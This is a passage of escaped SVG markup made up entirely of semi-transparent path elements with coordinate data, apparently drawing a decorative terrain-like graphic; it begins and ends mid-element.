d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 